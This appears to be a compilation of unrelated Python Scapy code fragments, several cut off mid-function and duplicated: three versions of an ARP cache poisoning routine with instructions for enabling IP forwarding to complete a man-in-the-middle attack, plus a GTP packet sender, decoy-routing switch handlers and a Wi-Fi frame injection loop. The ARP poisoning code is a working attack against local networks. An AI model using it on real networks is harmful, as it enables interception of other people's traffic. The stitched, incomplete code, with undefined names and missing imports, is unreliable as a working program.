def cmd_arpoison(t1, t2, verbose):
"""ARP cache poison"""
conf.verb = False
mac1 = getmacbyip(t1)
mac2 = getmacbyip(t2)
pkt1 = Ether(dst=mac1) / ARP(op="is-at", psrc=t2, pdst=t1, hwdst=mac1)
pkt2 = Ether(dst=mac2) / ARP(op="is-at", psrc=t1, pdst=t2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def cmd_arp_poison(victim1, victim2, iface, verbose):
"""Send ARP 'is-at' packets to each victim, poisoning their
ARP tables for send the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
\b
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
mac1 = getmacbyip(victim1)
mac2 = getmacbyip(victim2)
pkt1 = Ether(dst=mac1) / ARP(
op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
pkt2 = Ether(dst=mac2) / ARP(
op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def cmd_arp_poison(victim1, victim2, iface, verbose):
"""Send ARP 'is-at' packets to each victim, poisoning their
ARP tables for send the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
\b
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
"""
conf.verb = False
if iface:
conf.iface = iface
mac1 = getmacbyip(victim1)
mac2 = getmacbyip(victim2)
pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def pkt_callback(pkt):
try:
pkt = Ether(pkt)
except Exception as e:
self.exception(e)
if pcap_writer is not None:
pcap_writer.write(pkt)
if print_summary:
self.log(pkt.summary())
def main():
if len(sys.argv) < 2:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
iface = "eth1"
print "sending on interface %s" % (iface)
pkt = Ether(src='00:15:5d:00:00:00', dst='00:15:5d:00:00:03') / IPv6(
src="fc00::1", dst="fc00::4") / IPv6ExtHdrRouting(
segleft=2, type=4, addresses=[
"fc00::4", "fc00::101", "fc00::100"
]) / UDP(sport=64515, dport=2152) / GTP_U_Header(
TEID=32, Reserved=0, E=1) / dl_pdu_session(
gtp_ext=133, QoSID=14) / IPv6(
src="fc00::1", dst="fc00::2") / UDP(
dport=80, sport=35000) / sys.argv[1]
pkt.show2()
pkt.summary()
sendp(pkt, iface=iface, verbose=False)
def process_cpu_packet(packet):
'''
Given packet from client switch, update table with sequence number offset.
'''
# Validate packet
p_str = str(packet)
# 0-7 : preamble1
# 8 : reason
# 9-16 : preamble2
# 17-20 : tag_value
# 21- : data packet (TCP)
if p_str[:8] != '\x00' * 8 or p_str[8] != '\xab' or p_str[
9:17] != '\x00' * 8:
vprint('Packet discarded')
return
ip_hdr = None
tcp_hdr = None
tag = 0
try:
tag = struct.unpack('!I', p_str[17:21])[0]
p = Ether(p_str[21:])
ip_hdr = p['IP']
tcp_hdr = p['TCP']
except Exception as e:
vprint(e)
return
# Compute the difference
diff = tag - tcp_hdr.seq
# Don't reprocess packet
seen_lock.acquire()
if (ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport) in seen:
seen_lock.release()
vprint('already saw packet')
return
seen[(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport)] = diff
seen_lock.release()
vprintf('initial seqNo: %d\ttag: %d\n' % (tcp_hdr.seq, tag))
vprint('Packet received')
vprint(p.summary())
add_to_table(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport, diff)
# Send the packet back to the switch to forward
new_p = p_str[:8] + '\xac' + p_str[21:]
sendp(new_p, iface=args.interface, verbose=args.verbose)
try:
while 1:
r = select([f, s], [], [])[0]
# frame from /dev/net/tun
if f in r:
# tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
buf = os.read(f, 1526)
eth_rcvd_frame = Ether(buf[4:])
if DEBUG:
os.write(1, "Received from %s\n" % ifname)
if VERB:
os.write(1, "%s\n" % eth_rcvd_frame.summary())
# Prepare Dot11 frame for injection
dot11_sent_frame = RadioTap() / Dot11(
type="Data",
FCfield="from-DS",
addr1=eth_rcvd_frame.getlayer(Ether).dst,
addr2=BSSID)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if not HAS_SMAC:
dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
else:
dot11_sent_frame.addr3 = SMAC
if WEP:
dot11_sent_frame.FCfield |= 0x40
def handle_parse_covert(p_str):
'''
Given string packet, read the covert destination and send it back to
the switch.
'''
ip_hdr = None
tcp_hdr = None
try:
p = Ether(p_str[9:])
ip_hdr = p[IP]
tcp_hdr = p[TCP]
except Exception as e:
vprint(e)
# Don't reprocess packet
params = (ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport)
if params not in tcp_options:
return
vprint('Packet received')
vprint(p.summary())
# Look up the covert destination's IP address
payload = p[TCP].payload
abs_addr = ''
try:
# Request line should be of the form
# "GET http://www.example.com/ HTTP/1.1"
abs_addr = str(payload).strip().split()[1]
except Exception as e:
vprint(e)
return
url = urlparse(abs_addr)
covert_ip = ''
try:
covert_ip = socket.gethostbyname(url.hostname)
except Exception as e:
vprintf('Failed to lookup host %s:\n%s\n' % (url.hostname, e))
return
covert_port = url.port if url.port is not None else DEFAULT_PORT
# Update dict with info
k = (covert_ip, covert_port, args.switch_addr, tcp_hdr.sport)
seqack_base_lock.acquire()
if k in seqack_base:
seqack_base_lock.release()
return
seqack_base[k] = (tcp_hdr.seq, tcp_hdr.ack, ip_hdr.src, tcp_hdr.sport,
ip_hdr.dst, tcp_hdr.dport)
seqack_base_lock.release()
vprint('Decoded covert %s:%d' % (covert_ip, covert_port))
update_decoy_mapping_table(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst,
tcp_hdr.dport, covert_ip, covert_port)
# Send packet back to switch. Use hacky solution to avoid reprocessing
# this packet.
new_p = p_str[:8] + '\x00' + p_str[9:]
sendp(new_p, iface=args.interface, verbose=args.verbose)
# Create the initial SYN packet for the connection to the covert
# destination and send it back to the switch.
covert_syn = Ether(src=args.switch_mac)
covert_syn = covert_syn / IP(src=args.switch_addr, dst=covert_ip)
covert_syn = covert_syn / TCP(sport=tcp_hdr.sport,
dport=covert_port,
flags=SYN_FLAGS,
options=tcp_options[params],
seq=tcp_hdr.seq)
sendp(covert_syn, iface=args.interface, verbose=args.verbose)
try:
while 1:
r = select([f,s],[],[])[0]
# frame from /dev/net/tun
if f in r:
# tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
buf = os.read(f,1526)
eth_rcvd_frame=Ether(buf[4:])
if DEBUG:
os.write(1,"Received from %s\n" % ifname)
if VERB:
os.write(1,"%s\n" % eth_rcvd_frame.summary())
# Prepare Dot11 frame for injection
dot11_sent_frame = RadioTap()/Dot11(
type = "Data",
FCfield = "from-DS",
addr1 = eth_rcvd_frame.getlayer(Ether).dst,
addr2 = BSSID)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if not HAS_SMAC:
dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
else:
dot11_sent_frame.addr3 = SMAC
if WEP:
dot11_sent_frame.FCfield |= 0x40
